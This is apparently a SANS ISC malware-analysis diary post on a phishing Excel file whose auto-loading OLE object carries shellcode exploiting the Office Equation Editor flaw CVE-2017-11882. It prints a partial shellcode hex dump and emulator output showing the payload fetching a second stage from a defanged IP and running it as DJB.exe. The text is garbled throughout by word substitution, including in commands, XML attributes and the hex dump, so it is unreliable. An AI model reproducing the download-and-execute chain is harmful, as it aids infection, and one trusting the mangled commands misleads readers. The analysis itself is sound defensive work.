InfoSec Handlers Diary Weblog – SANS Web Storm Heart
Most individuals won’t ever execute a suspicious program or “executable”. Additionally, most of them can’t be delivered instantly by way of electronic mail. Most antispam and antivirus options block them. However, then, how may folks be so simply contaminated?
I’ll clarify with the assistance of a file I discovered in a phishing marketing campaign. The filename is “Swift23544679066.xlsx” (SHA256:421d30c99381f9fe4295c8c33d7e7278b323821c793bbe2f45d6003536871347) and remains to be unknown on VirusTotal. Here’s a screenshot of the file opened in Excel:
Many Excel sheets comprise VBA or legacy Excel 4 macros however right here.. nothing! Anyway, let’s take a look at potential OLE content material:
remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx A: xl/embeddings/8sJz9b3F.uBx2 A1: 919012 'x01OLE10NaTIvE' A2: 0 'VDYic03w91Qt'
This reveals that an OLE doc is embedded within the Excel sheet! Let’s unzip the doc and seek for fascinating strings:
remnux@remnux:/MalwareZoo/20230314/zip$ discover . -type f -exec grep 0LE {} ; -ls Binary file ./xl/embeddings/8sJz9b3F.uBx2 matches 1793 907 -rw-rw-r-- 1 501 dialout 928768 Mar 13 20:57 ./xl/embeddings/8sJz9b3F.uBx2
This stream is referenced in worksheets/_rels/sheet1.xml.rels:
<Relationship Id="rId3" Sort="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Goal="../embeddings/8sJz9b3F.uBx2"/></Relationships>
Let’s observe the ID ‘rId3’. It’s referenced in worksheets/sheet1.xml:
<oleObject progId="9PrBwSjsFc8A5FCXYG4ILw5IQi20z" shapeId="1506" r:id="rId3" autoLoad="true"/></oleObjects>
The OLE object shall be robotically used when the sufferer opens the doc!
Let’s give attention to this OLE stream now:
remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx -s A1 -a|head -20 00000000: 38 2B 7B 05 03 EE 69 DF B3 B1 01 08 AC BE B8 C3 8+{...i......... 00000010: 42 BA FF F7 D0 8B 30 8B 0E BB B6 8B 9B 83 81 C3 B.....0......... 00000020: FA DB AA 7C 8B 3B 51 FF D7 05 6F 4E 44 17 05 93 ...|.;Q...oND... 00000030: B2 BB E8 FF E0 64 37 33 D2 A3 80 04 42 00 C7 17 .....d73....B... 00000040: A9 EA 7C 40 45 85 4B 40 BD F2 58 8A 12 33 9A FB ..|@E.Okay@..X..3.. 00000050: 96 EE 49 37 5E 3A 8F 2C 46 46 9D 71 54 64 B7 6F ..I7^:.,FF.qTd.o 00000060: 16 DA DB 73 8E 71 CF 62 8B C6 F9 5E 9D 39 DC B3 ...s.q.b...^.9.. 00000070: 88 79 BB FC 41 2F 35 08 88 98 1E 4B 13 30 C3 A5 .y..A/5....Okay.0.. 00000080: D2 B6 B5 55 D8 A5 AB FB D8 E6 C6 E0 56 6D AD FA ...U........Vm.. 00000090: 85 FB D3 60 BC 1C 6D A9 BF 41 40 49 1B 06 F2 23 ...`..m..A@I...# 000000A0: DD 6C 88 26 6C A8 18 55 3D 5F 01 02 B1 4E 97 10 .l.&l..U=_...N.. 000000B0: DF C8 2B 22 0F 14 34 ED 9B 7A A8 9D 96 AD D5 05 ..+"..4..z...... 000000C0: DD 34 16 9D FD 17 D0 E2 FA 94 24 24 05 EC 2D 6B .4........$$..-k 000000D0: 8E 07 A8 F2 D7 3A 08 6B 6B 51 B5 E0 0A 04 FA 9C .....:.kkQ...... 000000E0: 9C A0 62 E8 19 20 99 D8 F4 3F 7F A5 0E 6C 7E B7 ..b.. ...?...l~. 000000F0: 32 B3 EE F7 1C CC EE E9 A6 A6 16 28 E5 74 F6 EE 2..........(.t.. 00000100: 08 98 B8 27 B6 07 E9 9B 01 00 00 F2 98 B8 8A 09 ...'............ 00000110: 04 54 13 DA 0A FF 45 1A 38 68 5C 7F 4F DC EB 00 .T....E.8h.O... 00000120: 85 93 1C 1F C2 E1 E7 1C E4 84 5E 3C FC DD E3 0E ..........^<.... 00000130: 8D 30 6D 9A D5 E3 C7 B8 FD C7 D1 3B 69 48 BE 3E .0m........;iH.>
We in all probability have right here a shellcode! How you can detect this? Do not forget that a shellcode is sort of a “bare” program, it’s lacking a number of helpful info current in a daily executable or PE file. To be executed efficiently, it should know two essential items of data:
- The place is it situated in reminiscence?
- How you can resolve API calls? (To name them and carry out malicious actions)
To unravel the primary drawback, many shellcodes carry out a way referred to as “GetEIP”. EIP is the register that comprises the tackle of the following instruction to be executed by the CPU. There’s a easy method to detect how “GetEIP” is applied. Let’s extract the stream containing the shellcode and use Didier’s device xorsearch[1]:
remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx -s A1 -d >shellcode.bin
remnux@remnux:/MalwareZoo/20230314$ xorsearch -W -d 3 shellcode.bin
Discovered XOR 00 place 00000106: GetEIP technique 3 E99B010000
Rating: 10
How you can interpret this command? xorsearch discovered a “GetEIP” technique at offset 106 within the payload we extracted from the OLE stream. We are actually able to examine our shell code and emulate it.
remnux@remnux:/MalwareZoo/20230314$ scdbgc /f shellcode.bin /foff 106
Loaded e05e4 bytes from file shellcode.bin
Initialization Full..
Max Steps: 2000000
Utilizing base offset: 0x401000
Execution begins at file offset 106
401106 E99B010000 jmp 0x4012a6 vv
40110b F298 repne cbw
40110d B88A090454 mov eax,0x5404098a
401112 13DA adc ebx,edx
401114 0AFF or bh,bh
4014d4 GetProcAddress(ExpandEnvironmentStringsW)
40150c ExpandEnvironmentStringsW(%APPDATApercentDJB.exe, dst=12fb64, sz=104)
401520 GetProcAddress(CreateFileW)
40153c CreateFileW(C:usersremnuxApplication DataDJB.exe) = 4
401556 LoadLibraryW(WinHttp)
40156c GetProcAddress(WinHttpOpen)
401578 WinHttpOpen(, 0, , , 0) = 29
401590 GetProcAddress(WinHttpConnect)
4015bb WinHttpConnect(29, 109[.]206[.]240[.]64 (40159a) , 50, 0) = 4823
4015d7 GetProcAddress(WinHttpOpenRequest)
401607 WinHttpOpenRequest(4823, GET, /KJH.exe, , , , 0) = 18be
401623 GetProcAddress(WinHttpSendRequest)
401635 WinHttpSendRequest(18be, )
401654 GetProcAddress(WinHttpReceiveResponse)
40165c WinHttpReceiveResponse()
401670 GetProcAddress(WriteFile)
401694 GetProcAddress(WinHttpQueryDataAvailable)
4016ae GetProcAddress(WinHttpReadData)
4016bb WinHttpQueryDataAvailable()
40170f GetProcAddress(CloseHandle)
401714 CloseHandle(4)
40172c GetProcAddress(GetStartupInfoW)
401736 GetStartupInfoW(12fda4)
40174d GetProcAddress(CreateProcessW)
401775 CreateProcessW( , C:usersremnuxApplication DataDJB.exe ) = 0x1269
401789 GetProcAddress(ExitProcess)
40178d ExitProcess(0)
Stepcount 42497
We will now “learn” what the shell code will do. Do not forget that a shell code should have the ability to resolve API name (see the second info that have to be recognized). To attain this, the shellcode will use the GetProcAddress() API name offered by the kernel32 DLL. We see that the shell code will resolve many fascinating API codes to carry out the next actions:
- Create a file DJB.exe in %appdata%
- Obtain the 2nd stage from http://109[.]206[.]240[.]64/KJH.exe
- Dump the downloaded payload to DJB.exe
- Create a brand new course of and launch DJB.exe
Sport over! This can occur with none popups or one thing to click on on. However wait, how can a shellcode be executed robotically by Excel simply when the doc is opened? Let’s take a look on the course of tree if you detonate the file in a sandbox:
You see that the method created by the shellcode (DJB.exe) has EQNEDT32.EXE because the mum or dad course of. That’s the equation editor device offered in Microsoft Workplace. It suffered from a really nasty vulnerability (CVE-2017-11882) and remains to be exploited within the wild at the moment! (in fact, my sandbox stays weak to this exploit)
[1] https://blog.didierstevens.com/2014/09/29/update-xorsearch-with-shellcode-detector/Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Safety Marketing consultant
PGP Key